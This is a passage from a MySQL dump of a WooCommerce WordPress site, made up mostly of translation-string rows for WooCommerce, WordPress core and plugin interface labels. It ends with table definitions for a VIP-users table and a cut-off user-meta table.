products with the specified attributes.','','woocommerce',0),(1062,'Limit result set to orders that don\'t include products with the specified attributes.','','woocommerce',0),(1063,'Total sales.','','woocommerce',0),(1064,'Amount discounted by coupons.','','woocommerce',0),(1065,'Unique coupons count.','','woocommerce',0),(1066,'Total of shipping.','','woocommerce',0),(1067,'Total of taxes.','','woocommerce',0),(1068,'Returns','','woocommerce',0),(1069,'Total of returns.','','woocommerce',0),(1070,'Items sold.','','woocommerce',0),(1071,'Products sold.','','woocommerce',0),(1072,'Gross sales.','','woocommerce',0),(1073,'Order ID.','','woocommerce',0),(1074,'Order Number.','','woocommerce',0),(1075,'Date the order was created, in the site\'s timezone.','','woocommerce',0),(1076,'Date the order was created, as GMT.','','woocommerce',0),(1077,'Net total revenue.','','woocommerce',0),(1078,'Net total revenue (formatted).','','woocommerce',0),(1079,'Returning or new customer.','','woocommerce',0),(1080,'List of order product IDs, names, quantities.','','woocommerce',0),(1081,'List of order coupons.','','woocommerce',0),(1082,'Order customer information.','','woocommerce',0),(1083,'Limit result set to items that have the specified product(s) assigned.','','woocommerce',0),(1084,'Limit result set to items that don\'t have the specified product(s) assigned.','','woocommerce',0),(1085,'Limit result set to items that have the specified variation(s) assigned.','','woocommerce',0),(1086,'Limit result set to items that don\'t have the specified variation(s) assigned.','','woocommerce',0),(1087,'Limit result set to items that have the specified coupon(s) assigned.','','woocommerce',0),(1088,'Limit result set to items that don\'t have the specified coupon(s) assigned.','','woocommerce',0),(1089,'Limit result set to items that have the specified tax rate(s) assigned.','','woocommerce',0),(1090,'Limit result set to items that don\'t have the specified tax rate(s) assigned.','','woocommerce',0),(1091,'Limit result set to items that have the specified order status.','','woocommerce',0),(1092,'Limit result set to items that don\'t have the specified order status.','','woocommerce',0),(1093,'Limit result set to returning or new customers.','','woocommerce',0),(1094,'Limit result set to specific types of refunds.','','woocommerce',0),(1095,'Add additional piece of info about each coupon to the report.','','woocommerce',0),(1096,'Limit result set to items that have the specified order ids.','','woocommerce',0),(1097,'Limit result set to items that don\'t have the specified order ids.','','woocommerce',0),(1098,'Orders','','woocommerce',0),(1099,'Number of orders','','woocommerce',0),(1100,'Average order value.','','woocommerce',0),(1101,'Average items per order','','woocommerce',0),(1102,'Number of items sold','','woocommerce',0),(1103,'Total distinct customers.','','woocommerce',0),(1104,'Number of distinct products sold.','','woocommerce',0),(1105,'Alias for customer_type (deprecated).','','woocommerce',0),(1106,'Limit result set to orders that have the specified customer_type','','woocommerce',0),(1107,'Amount of items sold.','','woocommerce',0),(1108,'Amount of products.','','woocommerce',0),(1109,'Limit result set to all items that have the specified term assigned in the categories taxonomy.','','woocommerce',0),(1110,'Add additional piece of info about each category to the report.','','woocommerce',0),(1111,'State.','','woocommerce',0),(1112,'Priority.','','woocommerce',0),(1113,'Total tax.','','woocommerce',0),(1114,'Order tax.','','woocommerce',0),(1115,'Shipping tax.','','woocommerce',0),(1116,'Limit result set to items assigned one or more tax rates.','','woocommerce',0),(1117,'Amount of tax codes.','','woocommerce',0),(1118,'Limit result set to all items that have the specified term assigned in the taxes taxonomy.','','woocommerce',0),(1119,'Coupon ID.','','woocommerce',0),(1120,'Net discount amount.','','woocommerce',0),(1121,'Coupon creation date.','','woocommerce',0),(1122,'Coupon creation date in GMT.','','woocommerce',0),(1123,'Coupon expiration date.','','woocommerce',0),(1124,'Coupon expiration date in GMT.','','woocommerce',0),(1125,'Coupon discount type.','','woocommerce',0),(1126,'Limit result set to coupons assigned specific coupon IDs.','','woocommerce',0),(1127,'Number of coupons.','','woocommerce',0),(1128,'Discounted orders','','woocommerce',0),(1129,'Number of discounted orders.','','woocommerce',0),(1130,'Stock status.','','woocommerce',0),(1131,'Manage stock.','','woocommerce',0),(1132,'Limit result set to items assigned a stock report type.','','woocommerce',0),(1133,'Number of low stock products.','','woocommerce',0),(1134,'Number of %s products.','','woocommerce',0),(1135,'ID.','','woocommerce',0),(1136,'The date of the download, in the site\'s timezone.','','woocommerce',0),(1137,'The date of the download, as GMT.','','woocommerce',0),(1138,'Download ID.','','woocommerce',0),(1139,'User ID for the downloader.','','woocommerce',0),(1140,'User name of the downloader.','','woocommerce',0),(1141,'IP address for the downloader.','','woocommerce',0),(1142,'Indicates whether all the conditions should be true for the resulting set, or if any one of them is sufficient. Match affects the following parameters: products, orders, username, ip_address.','','woocommerce',0),(1143,'Limit response to objects that have the specified user ids.','','woocommerce',0),(1144,'Limit response to objects that don\'t have the specified user ids.','','woocommerce',0),(1145,'Limit response to objects that have a specified ip address.','','woocommerce',0),(1146,'Limit response to objects that don\'t have a specified ip address.','','woocommerce',0),(1147,'Number of downloads.','','woocommerce',0),(1148,'Limit response to objects that have the specified customer ids.','','woocommerce',0),(1149,'Limit response to objects that don\'t have the specified customer ids.','','woocommerce',0),(1150,'Number of customers.','','woocommerce',0),(1151,'Average number of orders.','','woocommerce',0),(1152,'Average total spend per customer.','','woocommerce',0),(1153,'Average AOV per customer.','','woocommerce',0),(1154,'Batch endpoint for getting specific performance indicators from `stats` endpoints.','','woocommerce',0),(1155,'Stats about revenue.','','woocommerce',0),(1156,'Stats about orders.','','woocommerce',0),(1157,'Products detailed reports.','','woocommerce',0),(1158,'Stats about products.','','woocommerce',0),(1159,'Variations detailed reports.','','woocommerce',0),(1160,'Stats about variations.','','woocommerce',0),(1161,'Product categories detailed reports.','','woocommerce',0),(1162,'Stats about product categories.','','woocommerce',0),(1163,'Coupons detailed reports.','','woocommerce',0),(1164,'Stats about coupons.','','woocommerce',0),(1165,'Taxes detailed reports.','','woocommerce',0),(1166,'Stats about taxes.','','woocommerce',0),(1167,'Product downloads detailed reports.','','woocommerce',0),(1168,'Product download files detailed reports.','','woocommerce',0),(1169,'Stats about product downloads.','','woocommerce',0),(1170,'Customers detailed reports.','','woocommerce',0),(1171,'The specific chart this stat referrers to.','','woocommerce',0),(1172,'Human readable label for the stat.','','woocommerce',0),(1173,'Format of the stat.','','woocommerce',0),(1174,'Value of the stat. Returns null if the stat does not exist or cannot be loaded.','','woocommerce',0),(1175,'Limit response to specific report stats. Allowed values: %s.','','woocommerce',0),(1176,'UTC DateTime when the coupon expires.','','woocommerce',0),(1177,'Use WP Query arguments to modify the response; private query vars require appropriate authorization.','','woocommerce',0),(1178,'Download file URL.','','woocommerce',0),(1179,'Download ID (MD5).','','woocommerce',0),(1180,'Downloadable product ID.','','woocommerce',0),(1181,'Downloadable file name.','','woocommerce',0),(1182,'Number of downloads remaining.','','woocommerce',0),(1183,'The date when download access expires, in the site\'s timezone.','','woocommerce',0),(1184,'File details.','','woocommerce',0),(1185,'The date the customer was created, as GMT.','','woocommerce',0),(1186,'The date the customer was last modified, as GMT.','','woocommerce',0),(1187,'The email address for the customer.','','woocommerce',0),(1188,'Customer first name.','','woocommerce',0),(1189,'Customer last name.','','woocommerce',0),(1190,'Customer login name.','','woocommerce',0),(1191,'Customer password.','','woocommerce',0),(1192,'Last order data.','','woocommerce',0),(1193,'Last order ID.','','woocommerce',0),(1194,'The date of the customer last order, as GMT.','','woocommerce',0),(1195,'Quantity of orders made by the customer.','','woocommerce',0),(1196,'Total amount spent.','','woocommerce',0),(1197,'Avatar URL.','','woocommerce',0),(1198,'List of billing address data.','','woocommerce',0),(1199,'Address line 1.','','woocommerce',0),(1200,'Address line 2.','','woocommerce',0),(1201,'ISO code of the country.','','woocommerce',0),(1202,'List of shipping address data.','','woocommerce',0),(1203,'Limit result set to resources with a specific email.','','woocommerce',0),(1204,'Limit result set to resources with a specific role.','','woocommerce',0),(1205,'New user email address.','','woocommerce',0),(1206,'New user username.','','woocommerce',0),(1207,'New user password.','','woocommerce',0),(1208,'ID to reassign posts to.','','woocommerce',0),(1209,'The order ID.','','woocommerce',0),(1210,'The date the order note was created, in the site\'s timezone.','','woocommerce',0),(1211,'Order note.','','woocommerce',0),(1212,'Shows/define if the note is only for reference or for the customer (the user will be notified).','','woocommerce',0),(1213,'Order note content.','','woocommerce',0),(1214,'The date the order refund was created, in the site\'s timezone.','','woocommerce',0),(1215,'Refund amount.','','woocommerce',0),(1216,'Reason for refund.','','woocommerce',0),(1217,'Line item meta data.','','woocommerce',0),(1218,'Meta label.','','woocommerce',0),(1219,'Shipping class name.','','woocommerce',0),(1220,'Start date of sale price.','','woocommerce',0),(1221,'End date of sale price.','','woocommerce',0),(1222,'Download type, this controls the schema on the front-end.','','woocommerce',0),(1223,'Controls whether or not the product is listed as \"in stock\" or \"out of stock\" on the frontend.','','woocommerce',0),(1224,'List of upsell products IDs.','','woocommerce',0),(1225,'Image position. 0 means that the image is featured.','','woocommerce',0),(1226,'List of variations.','','woocommerce',0),(1227,'Variation ID.','','woocommerce',0),(1228,'If the variation is visible.','','woocommerce',0),(1229,'Controls whether or not the variation is listed as \"in stock\" or \"out of stock\" on the frontend.','','woocommerce',0),(1230,'Limit result set to products with a specific attribute.','','woocommerce',0),(1231,'Limit result set to products with a specific SKU.','','woocommerce',0),(1232,'Gross sales in the period.','','woocommerce',0),(1233,'Net sales in the period.','','woocommerce',0),(1234,'Average net daily sales.','','woocommerce',0),(1235,'Total of orders placed.','','woocommerce',0),(1236,'Total of items purchased.','','woocommerce',0),(1237,'Total charged for taxes.','','woocommerce',0),(1238,'Total charged for shipping.','','woocommerce',0),(1239,'Total of refunded orders.','','woocommerce',0),(1240,'Total of coupons used.','','woocommerce',0),(1241,'Group type.','','woocommerce',0),(1242,'Totals.','','woocommerce',0),(1243,'Report period.','','woocommerce',0),(1244,'Return sales for a specific start date, the date need to be in the %s format.','','woocommerce',0),(1245,'Return sales for a specific end date, the date need to be in the %s format.','','woocommerce',0),(1246,'Total number of purchases.','','woocommerce',0),(1247,'Tax class name.','','woocommerce',0),(1248,'Unique slug for the resource.','','woocommerce',0),(1249,'A friendly name for the webhook.','','woocommerce',0),(1250,'Webhook status.','','woocommerce',0),(1251,'Active','','woocommerce',0),(1252,'Paused','','woocommerce',0),(1253,'Disabled','','woocommerce',0),(1254,'Webhook topic.','','woocommerce',0),(1255,'Webhook resource.','','woocommerce',0),(1256,'Webhook event.','','woocommerce',0),(1257,'WooCommerce action names associated with the webhook.','','woocommerce',0),(1258,'The URL where the webhook payload is delivered.','','woocommerce',0),(1259,'Secret key used to generate a hash of the delivered webhook and provided in the request headers. This will default to a MD5 hash from the current user\'s ID|username if not provided.','','woocommerce',0),(1260,'The date the webhook was created, in the site\'s timezone.','','woocommerce',0),(1261,'The date the webhook was last modified, in the site\'s timezone.','','woocommerce',0),(1262,'Limit result set to webhooks assigned a specific status.','','woocommerce',0),(1263,'Webhook delivery URL.','','woocommerce',0),(1264,'Unique identifier for the webhook.','','woocommerce',0),(1265,'The delivery duration, in seconds.','','woocommerce',0),(1266,'A friendly summary of the response including the HTTP response code, message, and body.','','woocommerce',0),(1267,'The URL where the webhook was delivered.','','woocommerce',0),(1268,'Request headers.','','woocommerce',0),(1269,'Request body.','','woocommerce',0),(1270,'The HTTP response code from the receiving server.','','woocommerce',0),(1271,'The HTTP response message from the receiving server.','','woocommerce',0),(1272,'Array of the response headers from the receiving server.','','woocommerce',0),(1273,'The response body from the receiving server.','','woocommerce',0),(1274,'The date the webhook delivery was logged, in the site\'s timezone.','','woocommerce',0),(1275,'The date when download access expires, as GMT.','','woocommerce',0),(1276,'The date the customer was created, in the site\'s timezone.','','woocommerce',0),(1277,'The date the customer was last modified, in the site\'s timezone.','','woocommerce',0),(1278,'Customer role.','','woocommerce',0),(1279,'Is the customer a paying customer?','','woocommerce',0),(1280,'The date the order note was created, as GMT.','','woocommerce',0),(1281,'If true, the note will be shown to customers and they will be notified. If false, the note will be for admin reference only.','','woocommerce',0),(1282,'Limit result to customers or internal notes.','','woocommerce',0),(1283,'The date the order refund was created, as GMT.','','woocommerce',0),(1284,'User ID of user who created the refund.','','woocommerce',0),(1285,'If the payment was refunded via the API.','','woocommerce',0),(1286,'When true, the payment gateway API is used to generate the refund.','','woocommerce',0),(1287,'End date of sale price, as GMT.','','woocommerce',0),(1288,'Define if the variation is visible on the product\'s page.','','woocommerce',0),(1289,'Shipping zone name.','','woocommerce',0),(1290,'Shipping zone order.','','woocommerce',0),(1291,'Shipping zone location code.','','woocommerce',0),(1292,'Shipping zone location type.','','woocommerce',0),(1293,'Unique ID for the zone.','','woocommerce',0),(1294,'Shipping method instance ID.','','woocommerce',0),(1295,'Shipping method customer facing title.','','woocommerce',0),(1296,'Shipping method sort order.','','woocommerce',0),(1297,'Shipping method enabled status.','','woocommerce',0),(1298,'Shipping method title.','','woocommerce',0),(1299,'Shipping method description.','','woocommerce',0),(1300,'Shipping method settings.','','woocommerce',0),(1301,'Unique ID for the instance.','','woocommerce',0),(1302,'The date the webhook was created, as GMT.','','woocommerce',0),(1303,'The date the webhook was last modified, as GMT.','','woocommerce',0),(1304,'The date the webhook delivery was logged, as GMT.','','woocommerce',0),(1305,'Environment.','','woocommerce',0),(1306,'Home URL.','','woocommerce',0),(1307,'Site URL.','','woocommerce',0),(1308,'WooCommerce version.','','woocommerce',0),(1309,'Log directory.','','woocommerce',0),(1310,'Is log directory writable?','','woocommerce',0),(1311,'WordPress version.','','woocommerce',0),(1312,'Is WordPress multisite?','','woocommerce',0),(1313,'WordPress memory limit.','','woocommerce',0),(1314,'Is WordPress debug mode active?','','woocommerce',0),(1315,'Are WordPress cron jobs enabled?','','woocommerce',0),(1316,'WordPress language.','','woocommerce',0),(1317,'Server info.','','woocommerce',0),(1318,'PHP version.','','woocommerce',0),(1319,'PHP post max size.','','woocommerce',0),(1320,'PHP max execution time.','','woocommerce',0),(1321,'PHP max input vars.','','woocommerce',0),(1322,'cURL version.','','woocommerce',0),(1323,'Is SUHOSIN installed?','','woocommerce',0),(1324,'Max upload size.','','woocommerce',0),(1325,'MySQL version.','','woocommerce',0),(1326,'MySQL version string.','','woocommerce',0),(1327,'Default timezone.','','woocommerce',0),(1328,'Is fsockopen/cURL enabled?','','woocommerce',0),(1329,'Is SoapClient class enabled?','','woocommerce',0),(1330,'Is DomDocument class enabled?','','woocommerce',0),(1331,'Is GZip enabled?','','woocommerce',0),(1332,'Is mbstring enabled?','','woocommerce',0),(1333,'Remote POST successful?','','woocommerce',0),(1334,'Remote POST response.','','woocommerce',0),(1335,'Remote GET successful?','','woocommerce',0),(1336,'Remote GET response.','','woocommerce',0),(1337,'Database.','','woocommerce',0),(1338,'WC database version.','','woocommerce',0),(1339,'Database prefix.','','woocommerce',0),(1340,'MaxMind GeoIP database.','','woocommerce',0),(1341,'Database tables.','','woocommerce',0),(1342,'Active plugins.','','woocommerce',0),(1343,'Inactive plugins.','','woocommerce',0),(1344,'Dropins & MU plugins.','','woocommerce',0),(1345,'Theme.','','woocommerce',0),(1346,'Theme name.','','woocommerce',0),(1347,'Theme version.','','woocommerce',0),(1348,'Latest version of theme.','','woocommerce',0),(1349,'Theme author URL.','','woocommerce',0),(1350,'Is this theme a child theme?','','woocommerce',0),(1351,'Does the theme declare WooCommerce support?','','woocommerce',0),(1352,'Does the theme have a woocommerce.php file?','','woocommerce',0),(1353,'Does this theme have outdated templates?','','woocommerce',0),(1354,'Template overrides.','','woocommerce',0),(1355,'Parent theme name.','','woocommerce',0),(1356,'Parent theme version.','','woocommerce',0),(1357,'Parent theme author URL.','','woocommerce',0),(1358,'Settings.','','woocommerce',0),(1359,'REST API enabled?','','woocommerce',0),(1360,'SSL forced?','','woocommerce',0),(1361,'Currency.','','woocommerce',0),(1362,'Currency symbol.','','woocommerce',0),(1363,'Currency position.','','woocommerce',0),(1364,'Thousand separator.','','woocommerce',0),(1365,'Decimal separator.','','woocommerce',0),(1366,'Number of decimals.','','woocommerce',0),(1367,'Geolocation enabled?','','woocommerce',0),(1368,'Taxonomy terms for product/order statuses.','','woocommerce',0),(1369,'Terms in the product visibility taxonomy.','','woocommerce',0),(1370,'Security.','','woocommerce',0),(1371,'Is the connection to your store secure?','','woocommerce',0),(1372,'Hide errors from visitors?','','woocommerce',0),(1373,'WooCommerce pages.','','woocommerce',0),(1374,'Total post count.','','woocommerce',0),(1375,'A unique identifier for the tool.','','woocommerce',0),(1376,'Tool name.','','woocommerce',0),(1377,'What running the tool will do.','','woocommerce',0),(1378,'Tool description.','','woocommerce',0),(1379,'Did the tool run successfully?','','woocommerce',0),(1380,'Tool return message.','','woocommerce',0),(1381,'Method ID.','','woocommerce',0),(1382,'Payment gateway ID.','','woocommerce',0),(1383,'Payment gateway title on checkout.','','woocommerce',0),(1384,'Payment gateway description on checkout.','','woocommerce',0),(1385,'Payment gateway sort order.','','woocommerce',0),(1386,'Payment gateway enabled status.','','woocommerce',0),(1387,'Payment gateway method title.','','woocommerce',0),(1388,'Payment gateway method description.','','woocommerce',0),(1389,'Payment gateway settings.','','woocommerce',0),(1390,'Order note author.','','woocommerce',0),(1391,'If true, this note will be attributed to the current user. If false, the note will be attributed to the system.','','woocommerce',0),(1392,'Amount that will be refunded for this line item (excluding taxes).','','woocommerce',0),(1393,'Amount that will be refunded for this tax.','','woocommerce',0),(1394,'When true, refunded items are restocked.','','woocommerce',0),(1395,'Order status name.','','woocommerce',0),(1396,'Amount of orders.','','woocommerce',0),(1397,'Product type name.','','woocommerce',0),(1398,'Customer type name.','','woocommerce',0),(1399,'Amount of customers.','','woocommerce',0),(1400,'Coupon type name.','','woocommerce',0),(1401,'Amount of coupons.','','woocommerce',0),(1402,'Review type name.','','woocommerce',0),(1403,'Amount of reviews.','','woocommerce',0),(1404,'Supported features for this payment gateway.','','woocommerce',0),(1405,'2 character continent code.','','woocommerce',0),(1406,'ISO4217 currency code.','','woocommerce',0),(1407,'Platform to track.','','woocommerce',0),(1408,'Platform version to track.','','woocommerce',0),(1409,'words','','woocommerce',0),(1410,'Edit Profile','','default',0),(1411,'Log Out','','default',0),(1412,'Search','','default',0),(1413,'Howdy, %s','','default',0),(1414,'About WordPress','','default',0),(1415,'WordPress.org','','default',0),(1416,'https://wordpress.org/','','default',0),(1417,'Documentation','','default',0),(1418,'https://wordpress.org/support/','','default',0),(1419,'Support','','default',0),(1420,'https://wordpress.org/support/forums/','','default',0),(1421,'Feedback','','default',0),(1422,'https://wordpress.org/support/forum/requests-and-feedback','','default',0),(1423,'Dashboard','','default',0),(1424,'Themes','','default',0),(1425,'Widgets','','default',0),(1426,'Menus','','default',0),(1427,'Background','','default',0),(1428,'Header','','default',0),(1429,'Customize','','default',0),(1430,'%d Theme Updates','','default',0),(1431,'%s updates available','','default',0),(1432,'%s Comments in moderation','','default',0),(1433,'User','','default',0),(1434,'New','','default',0),(1435,'Purge Current Page','','nginx-helper',0),(1436,'Products','','wc-frontend-manager',0),(1437,'Coupons','','wc-frontend-manager',0),(1438,'Orders','','wc-frontend-manager',0),(1439,'Reports','','wc-frontend-manager',0),(1440,'Settings','','wc-frontend-manager',0),(1441,'Capability','','wc-frontend-manager',0),(1442,'Store','','wc-frontend-manager',0),(1443,'Store','','wc-multivendor-marketplace',0),(1444,'Vendors','','wc-frontend-manager',0),(1445,'WCFM','','wordpress-seo',0),(1446,'Add New','','wc-frontend-manager',0),(1447,'Store Vendors','','wc-frontend-manager',0),(1448,'Email Source: %s','','default',0),(1449,'The following addons cannot be used, because they require %1$s%2$s %3$s%4$s to work:','','all-in-one-seo-pack',0),(1450,'SEO','','all-in-one-seo-pack',0),(1451,'Notifications','','all-in-one-seo-pack',0),(1452,'Analyze this page','','all-in-one-seo-pack',0),(1453,'Check links to this URL','','all-in-one-seo-pack',0),(1454,'Check Google Cache','','all-in-one-seo-pack',0),(1455,'Google Structured Data Test','','all-in-one-seo-pack',0),(1456,'Facebook Debugger','','all-in-one-seo-pack',0),(1457,'Pinterest Rich Pins Validator','','all-in-one-seo-pack',0),(1458,'HTML Validator','','all-in-one-seo-pack',0),(1459,'CSS Validator','','all-in-one-seo-pack',0),(1460,'Google Page Speed Test','','all-in-one-seo-pack',0),(1461,'Mobile-Friendly Test','','all-in-one-seo-pack',0),(1462,'LinkedIn Post Inspector','','all-in-one-seo-pack',0),(1463,'SEO Settings','','all-in-one-seo-pack',0),(1464,'Upgrade to Pro','','all-in-one-seo-pack',0),(1465,'Toolbar','','default',0),(1466,'Skip to content','','open-shop',0),(1467,'words','','default',0),(1468,'Call To','','open-shop',0),(1469,'Email :','','open-shop',0),(1470,'Info@gmail.com','','open-shop',0),(1471,'Category','','open-shop',0),(1472,'No categories','','open-shop',0),(1473,'No categories','','default',0),(1474,'Categories','','default',0),(1475,'Search','','th-advance-product-search',0),(1476,'Submit','','th-advance-product-search',0),(1477,'off','','default',0),(1478,'Quantity','','taiowc',0),(1479,'Remove this item','','woocommerce',0),(1480,'View cart','','woocommerce',0),(1481,'Checkout','','woocommerce',0),(1482,'Free Shiping','','open-shop',0),(1483,'On all order over ','','open-shop',0),(1484,'Shop and search results','','woocommerce',0),(1485,'Shop only','','woocommerce',0),(1486,'Search results only','','woocommerce',0),(1487,'Hidden','','woocommerce',0),(1488,'Quick View','','open-shop',0),(1489,'Text','','flexible-product-fields',0),(1490,'Field label','','flexible-product-fields',0),(1491,'This field is required.','','flexible-product-fields',0),(1492,'Required field','','flexible-product-fields',0),(1493,'Placeholder','','flexible-product-fields',0),(1494,'CSS class','','flexible-product-fields',0),(1495,'Enter CSS classes separated by a space.','','flexible-product-fields',0),(1496,'Tooltip','','flexible-product-fields',0),(1497,'Enter the hint text that will appear after hovering over the [?] icon next to the field label.','','flexible-product-fields',0),(1498,'Field name','','flexible-product-fields',0),(1499,'Character Limit','','flexible-product-fields',0),(1500,'Price settings are available in the PRO version. %1$sRead the documentation%2$s','','flexible-product-fields',0),(1501,'Conditional logic is available in the PRO version. %1$sRead the documentation%2$s','','flexible-product-fields',0),(1502,'Textarea','','flexible-product-fields',0),(1503,'Number','','flexible-product-fields',0),(1504,'Min value','','flexible-product-fields',0),(1505,'Max value','','flexible-product-fields',0),(1506,'Step value','','flexible-product-fields',0),(1507,'E-mail','','flexible-product-fields',0),(1508,'URL','','flexible-product-fields',0),(1509,'Checkbox','','flexible-product-fields',0),(1510,'Checked by default','','flexible-product-fields',0),(1511,'Label when checked','','flexible-product-fields',0),(1512,'Enter the text that will appear next to the label if the user selects this field. The text will be visible e.g. in the Cart instead of the selected box.','','flexible-product-fields',0),(1513,'Yes','','flexible-product-fields',0),(1514,'Multi-checkbox','','flexible-product-fields',0),(1515,'Options','','flexible-product-fields',0),(1516,'Option #%s','','flexible-product-fields',0),(1517,'Value','','flexible-product-fields',0),(1518,'Allowed characters: letters, numbers and underscore.','','flexible-product-fields',0),(1519,'Label','','flexible-product-fields',0),(1520,'Minimum of selected values','','flexible-product-fields',0),(1521,'Check the \"Required field\" option in the \"General\" tab for the following setting to work.','','flexible-product-fields',0),(1522,'Maximum number of selected values','','flexible-product-fields',0),(1523,'Select','','flexible-product-fields',0),(1524,'Enter a value and a label for each field option. The value will not be visible in the form. The label will be visible.','','flexible-product-fields',0),(1525,'Multi-select','','flexible-product-fields',0),(1526,'Radio','','flexible-product-fields',0),(1527,'Radio with images','','flexible-product-fields',0),(1528,'Image','','flexible-product-fields',0),(1529,'Single item width in px','','flexible-product-fields',0),(1530,'Hide labels for Options','','flexible-product-fields',0),(1531,'Radio with colors','','flexible-product-fields',0),(1532,'Color','','flexible-product-fields',0),(1533,'Date','','flexible-product-fields',0),(1534,'Time','','flexible-product-fields',0),(1535,'Use 12-hour clock','','flexible-product-fields',0),(1536,'Step minute','','flexible-product-fields',0),(1537,'File Upload','','flexible-product-fields',0),(1538,'Heading','','flexible-product-fields',0),(1539,'Paragraph','','flexible-product-fields',0),(1540,'Image width (in pixels)','','flexible-product-fields',0),(1541,'HTML','','flexible-product-fields',0),(1542,'Gift to someone !!!! Sent a message to your loved ones','','flexible-product-fields',0),(1543,'Add to cart','','woocommerce',0),(1544,'Invalid product.','','woocommerce',0),(1545,'Menu','','default',0),(1546,'Placeholder','','woocommerce',0),(1547,'Go to','','perfect-woocommerce-brands',0),(1548,'Size','','default',0),(1549,'Width','','default',0),(1550,'Height','','default',0),(1551,'Caption','','default',0),(1552,'Alternative Text','','default',0),(1553,'Link To','','default',0),(1554,'URL','','default',0),(1555,'Image CSS Class','','default',0),(1556,'Link CSS Class','','default',0),(1557,'Link Rel','','default',0),(1558,'Open link in a new tab','','default',0),(1559,'Image Title Attribute','','default',0),(1560,'Attachment post ID','','default',0),(1561,'URL to the media file','','default',0),(1562,'Title for the widget','','default',0),(1563,'No product categories exist.','','woocommerce',0),(1564,'Y','','open-shop',0),(1565,'Designed by','','open-shop',0),(1566,'https://themehunk.com/','','open-shop',0),(1567,'Themehunk','','open-shop',0),(1568,'<a href=\"%1$s\" %2$s>Learn how to describe the purpose of the image%3$s</a>. Leave empty if the image is purely decorative.','','default',0),(1569,'(opens in a new tab)','','default',0),(1570,'Actions','','default',0),(1571,'Selected media actions','','default',0),(1572,'Close dialog','','default',0),(1573,'Drop files to upload','','default',0),(1574,'Close uploader','','default',0),(1575,'or','','default',0),(1576,'Select Files','','default',0),(1577,'Maximum upload file size: %s.','','default',0),(1578,'TB','','default',0),(1579,'GB','','default',0),(1580,'MB','','default',0),(1581,'KB','','default',0),(1582,'B','','default',0),(1583,'Suggested image dimensions: %1$s by %2$s pixels.','','default',0),(1584,'List view','','default',0),(1585,'Grid view','','default',0),(1586,'Uploading','','default',0),(1587,'Dismiss errors','','default',0),(1588,'Edit previous media item','','default',0),(1589,'Edit next media item','','default',0),(1590,'Attachment Preview','','default',0),(1591,'Edit Image','','default',0),(1592,'Document Preview','','default',0),(1593,'Saved.','','default',0),(1594,'Details','','default',0),(1595,'Uploaded on:','','default',0),(1596,'Uploaded by:','','default',0),(1597,'Uploaded to:','','default',0),(1598,'File name:','','default',0),(1599,'File type:','','default',0),(1600,'File size:','','default',0),(1601,'Dimensions:','','default',0),(1602,'%1$s by %2$s pixels','','default',0),(1603,'Original image:','','default',0),(1604,'Length:','','default',0),(1605,'Bitrate:','','default',0),(1606,'Used as:','','default',0),(1607,'Title','','default',0),(1608,'Artist','','default',0),(1609,'Album','','default',0),(1610,'Description','','default',0),(1611,'File URL:','','default',0),(1612,'Copy URL to clipboard','','default',0),(1613,'Copied!','','default',0),(1614,'View attachment page','','default',0),(1615,'Edit more details','','default',0),(1616,'Delete permanently','','default',0),(1617,'Remove','','default',0),(1618,'Deselect','','default',0),(1619,'Caption&hellip;','','default',0),(1620,'Video title','','default',0),(1621,'Video title&hellip;','','default',0),(1622,'Audio title','','default',0),(1623,'Audio title&hellip;','','default',0),(1624,'Media title','','default',0),(1625,'Media title&hellip;','','default',0),(1626,'Attachment Details','','default',0),(1627,'Alt Text','','default',0),(1628,'Edit Selection','','default',0),(1629,'Clear','','default',0),(1630,'Attachment Display Settings','','default',0),(1631,'Alignment','','default',0),(1632,'Left','','default',0),(1633,'Center','','default',0),(1634,'Right','','default',0),(1635,'None','','default',0),(1636,'Embed or Link','','default',0),(1637,'Embed Media Player','','default',0),(1638,'Link to Media File','','default',0),(1639,'Media File','','default',0),(1640,'Link to Attachment Page','','default',0),(1641,'Attachment Page','','default',0),(1642,'Custom URL','','default',0),(1643,'Thumbnail','','default',0),(1644,'Medium','','default',0),(1645,'Large','','default',0),(1646,'Full Size','','default',0),(1647,'Gallery Settings','','default',0),(1648,'Columns','','default',0),(1649,'Random Order','','default',0),(1650,'Playlist Settings','','default',0),(1651,'Show Video List','','default',0),(1652,'Show Tracklist','','default',0),(1653,'Show Artist Name in Tracklist','','default',0),(1654,'Show Images','','default',0),(1655,'Link Text','','default',0),(1656,'Align','','default',0),(1657,'Image URL','','default',0),(1658,'Display Settings','','default',0),(1659,'Custom Size','','default',0),(1660,'Image size in pixels','','default',0),(1661,'Advanced Options','','default',0),(1662,'Edit Original','','default',0),(1663,'Replace','','default',0),(1664,'Remove audio source','','default',0),(1665,'Add alternate sources for maximum HTML5 playback','','default',0),(1666,'Preload','','default',0),(1667,'Auto','','default',0),(1668,'Metadata','','default',0),(1669,'Autoplay','','default',0),(1670,'Loop','','default',0),(1671,'Remove video source','','default',0);
/*!40000 ALTER TABLE `wp_trp_gettext_en_us` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_um_vip_users`
--

DROP TABLE IF EXISTS `wp_um_vip_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_um_vip_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL,
  `user_type` tinyint(4) NOT NULL DEFAULT 0,
  `startTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `endTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `uid_index` (`user_id`),
  KEY `utype_index` (`user_type`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_um_vip_users`
--

LOCK TABLES `wp_um_vip_users` WRITE;
/*!40000 ALTER TABLE `wp_um_vip_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_um_vip_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
